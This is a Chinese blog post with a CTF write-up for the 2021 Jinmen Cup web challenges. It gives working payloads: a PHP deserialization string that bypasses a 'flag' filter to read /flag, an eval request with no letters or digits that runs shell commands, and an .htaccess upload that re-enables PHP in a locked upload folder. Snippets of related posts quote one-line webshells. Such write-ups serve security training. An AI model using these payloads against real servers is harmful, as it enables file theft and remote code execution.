津门杯wp

最新推荐文章于 2024-06-29 20:11:23 发布
最新推荐文章于 2024-06-29 20:11:23 发布
阅读量258 收藏 1
点赞数
分类专栏: CTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53755216/article/details/116567465
版权

津门杯wp

周末打了津门杯 解出两道web 因为要期中考试 只做了一小会
团队总共解出了六题 拿了个80名(捂脸

Power cut

扫一下目录发现 .index.php.swp 有源码

<?php
class logger{
    public $logFile;
    public $initMsg;
    public $exitMsg;

    function __construct($file){
        // initialise variables
        $this->initMsg="#--session started--#\n";
        $this->exitMsg="#--session end--#\n";
        $this->logFile =  $file;
        readfile($this->logFile);

    }

    function log($msg){
        $fd=fopen($this->logFile,"a+");
        fwrite($fd,$msg."\n");
        fclose($fd);
    }

    function __destruct(){
        echo "this is destruct";
    }
}

class weblog {
    public $weblogfile;

    function __construct() {
        $flag="system('cat /flag')";
        echo "$flag";
    }

    function __wakeup(){
        // self::waf($this->filepath);
        $obj = new logger($this->weblogfile);
    }

    public function waf($str){
        $str=preg_replace("/[<>*#'|?\n ]/","",$str);
        $str=str_replace('flag','',$str);
        return $str;
    }

    function __destruct(){
        echo "this is destruct";
    }

}

$log = $_GET['log'];
$log = preg_replace("/[<>*#'|?\n ]/","",$log);
$log = str_replace('flag','',$log);
$log_unser = unserialize($log);

?>

一道很简单的反序列化题目
想要利用readfile函数
双写绕过即可

O:6:"weblog":1:{s:10:"weblogfile";s:5:"/fflaglag";}

hate_php

<?php
error_reporting(0);
if(!isset($_GET['code'])){
    highlight_file(__FILE__);
}else{
    $code = $_GET['code'];
    if(preg_match("/[A-Za-z0-9_$@]+/",$code)){
        die('fighting!'); 
    }
    eval($code);
}

一道无数字字母命令执行题目
参考P神文章
https://www.leavesongs.com/PENETRATION/webshell-without-alphanum-advanced.html

POST /?code=%3f><%3f%3d`.+/%3f%3f%3f/%3f%3f%3f%3f%3f%3f%3f%3f[:-[]`%3b%3f> HTTP/1.1

下面的题目是在 buu 复现的

uploadhub

额。。。看上去过滤了 。。 实际上没过滤
上传一个 一句话试试。。
结果没开php解析?

在config文件中找了一下 果然发现端倪

<Directory ~ "/var/www/html/upload/[a-f0-9]{32}/">
        php_flag engine off
</Directory>

因为可以随意上传文件 所以要上传一个文件把php解析给打开

<file>标签的优先级高于<Directory>

<Files ~ "^.ht">
 Require all granted
 Order allow,deny
 Allow from all
 php_flag engine on
</Files>
SetHandler application/x-httpd-php
# <?php phpinfo(); ?>
b1ue0cean
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
[网络安全提高篇] 一一二.DataCon Coremail邮件安全竞赛之钓鱼邮件识别及分类
杨秀璋的专栏
10-26 2万+
这是作者2020年参加清华大学、Coremail、奇安信DataCon举办的比赛,主要是关于钓鱼和异常邮件识别研究。非常感谢举办方让我们学到了新知识,DataCon也是我比较喜欢和推荐的大数据安全比赛,这篇文章2020年10月就进了我的草稿箱,但由于小珞珞刚出生,所以今天才发表,希望对您有所帮助!感恩同行,不负青春。
津门WP
qq_51425032的博客
05-12 529
津门WP 前言:由于津门和红帽俩比赛撞在一起,就顺便和队友一起打了,但后面专门去红帽了,自己还是好菜,前面的都全A了 web1 power_cut 打开后显示:昨天晚上因为14级大风停电了. 猜测跟意外关闭后生成的备份文件相关,访问http://119.3.128.126:32800/.index.php.swp 获得文件,vim -r恢复得到源码: <?php class logger{ public $logFile; ​ public $initMsg; ​ public $
2021津门部分RE题wp
sln_1550的博客
05-11 972
文章目录GoodREeasyRebabydsp GoodRE 很简单的一个TEA算法,直接用脚本解密: def decrypt(v, k): v0 = v[0] v1 = v[1] x = 0xC6EF3720 delta = 0x9E3779B9 k0 = k[0] k1 = k[1] k2 = k[2] k3 = k[3] for i in range(32): v1 -= ((v0 << 4) + k2
-Web-hate_php
最新发布
2301_80113257的博客
06-29 174
代码审计后,发现对输入code进行了正则表达式匹配,过滤了英文大小写字母、数字和_$@三个特殊字符。本题的关键就是绕过正则匹配,执行eval()函数。读取到源码发现存在如下函数(我没找到?最后直接读取flag文件。
后浪CTF-WP
luoluopeach
06-22 1105
实验室内部举行的24小时考核赛 目录CRYPTO1.CRYPTO-warmup2.佛曰3.babyRSA4.hard_crypto5.aesREVERSE1.BabyRe2.HelloCTF3.insanityMISC1.真签到2.宝可梦二代WEB1.爆破2.command???写在最后的 CRYPTO 1.CRYPTO-warmup 题目: R1EzREVNWlZHTVpVR05KWkdVWkRLUUpXR0VaRUNNWlFHWkFUR1FaV0lFM1RDTkpZR1JEREdPSlRJSVpUQ05
津门pwn
清霂的博客
05-13 325
目录hello 嘿嘿,单独发纪念一下,首次在国内比赛做出一道pwn题(23/59) hello #!/usr/bin/env python2 # coding=utf-8 from pwn import * arch = "amd64" filename = "hello" context(os="linux", arch=arch, log_level="debug") content = 0 offset = 0 # elf elf = ELF(filename) free_got=elf.got
2020第五空间 web writeup
a3320315的博客
06-27 3374
hate-php 源码 <?php error_reporting(0); if(!isset($_GET['code'])){ highlight_file(__FILE__); }else{ $code = $_GET['code']; if (preg_match('/(f|l|a|g|\.|p|h|\/|;|\"|\'|\`|\||\[|\]|\_|=)/i',$code)) { die('You are too good for me');
2021年津门ctf线上赛记录(WICCTF)
lifanxin的博客
05-12 1968
津门ctf线上赛概述pwn题easypwnpwnCTFM总结 概述   本篇博客记录下自己的第一次ctf比赛经历,其实不完全是第一次,之前也参加过其他比赛,但只能做个签到就走了,这次不一样了,好歹做出了一道pwn题,有一道本来是有机会的,搞错libc了,线上没拿到flag,不过线上复现了下,感觉还行。因此特写下此篇博文,记录自己的一血。???? pwn题   我个人现在只会做做pwn题,后面打算也看看web,提升一下综合实力,这里介绍下比赛中的两道pwn题,和官方wp不一样,这里是我自己的思路。 easy
[津门]全部WEB题解
lllffg的博客
05-11 1111
津门WEB题解 日常比赛被爆,感谢队里教我题的大师傅 power_cut 存在一个.index.php.swp文件,vim -r 恢复一下 <?php class logger{ public $logFile; public $initMsg; public $exitMsg; function __construct($file){ // initialise variables $this->initMsg="#--sess
WICCTF-2021-easypwn
05-12
2021津门ctf的第一道pwn题。
preg_match函数绕过
weixin_42478365的博客
10-10 7477
<?php error_reporting(0); if(!isset($_GET['code'])){ highlight_file(__FILE__); }else{ $code = $_GET['code']; if(preg_match("/[A-Za-z0-9_$@]+/",$code)){ die('fighting!'); } eval($code); } 1.绕过数字和字母 首先,我们常见的CTF题代码如下,主要是绕过数字和字
WEB 渗透题(二)
0xac001d09
12-09 1650
[ACTF2020 新生赛]Upload–上传 验证了后缀名,要求上传 jpg、png、gif 结尾的图片,写一句话木马上传,一开始只能是图片的后缀,抓包改后缀为 phtml,文件内容如下 GFI89a <script language="php">eval($_POST['hello']) </script> 上传成功,显示 Upload Success! Look here~ ./uplo4d/fc7cad21c9c68a7847837cf3c194f78d.phtml 直接
CTFshow——web入门——php特性(下篇)
h_adam的博客
02-06 5892
web入门——php特性web123web125web126 web123 题目 <?php error_reporting(0); highlight_file(__FILE__); include("flag.php"); $a=$_SERVER['argv']; $c=$_POST['fun']; if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g']))
【CTFhub】——hate_php2021
manerzi的博客
11-02 1289
【CTFhub】——hate_php2021
第五空间 hate_php
weixin_53955759的博客
09-30 1645
打开环境源码如下 正则匹配过滤了flag . p h / ; " ' ` | [ ] _ 绕过正则匹配的方法可以用两次取反urlencode编码来绕过它 看了wp,在php7以后可以用($a)();来执行函数 它会先执行($a)里面的函数,之后在执行();里的函数 那么就用highlight_file来返回flag.php的内容 ...
ctfhub hate_php
m0_57954651的博客
11-15 366
闭合前面的php 同时执行我们后面构造想要执行的内容。首先进行了一个正则匹配 过滤掉了A~Z的26个字母大写 a ~ z的26个字母小写 0 ~9这十个数字。preg_match函数。我们需要构造语句绕过。
【第五空间智能安全大赛】web hate-php
weixin_45844670的博客
09-13 727
进入题目链接 得到源码 <?php error_reporting(0); if(!isset($_GET['code'])){ highlight_file(__FILE__); }else{ $code = $_GET['code']; if (preg_match('/(f|l|a|g|\.|p|h|\/|;|\"|\'|\`|\||\[|\]|\_|=)/i',$code)) { die('You are too good for me');
CTF-PHP代码审计,正则表达式记录
江湖
06-08 5911
1.flag In the variable ! &lt;?php error_reporting(0); include "flag1.php"; highlight_file(__file__); if(isset($_GET['args'])){ $args = $_GET['args']; if(!preg_match("/^\w+$/",$args)){ ...
ctfshow web入门 php特性
Sentiment的博客
04-11 5386
web89 intval() 函数用于获取变量的整数值,可preg_match过滤了数字,这里可以用数组绕过,因为preg_match无法处理数组 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if
列举天津最好玩的十大景点,并说明理由
02-10
3. 津门古迹:津门古迹是天津的传统景点,包括古城墙、津门古街、古建筑等,可以让游客感受到古代的风貌。 4. 天津中医药大学:位于天津市滨海新区,是一所集中医药教育、科研和医疗服务于一体的综合性大学。 5. ...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值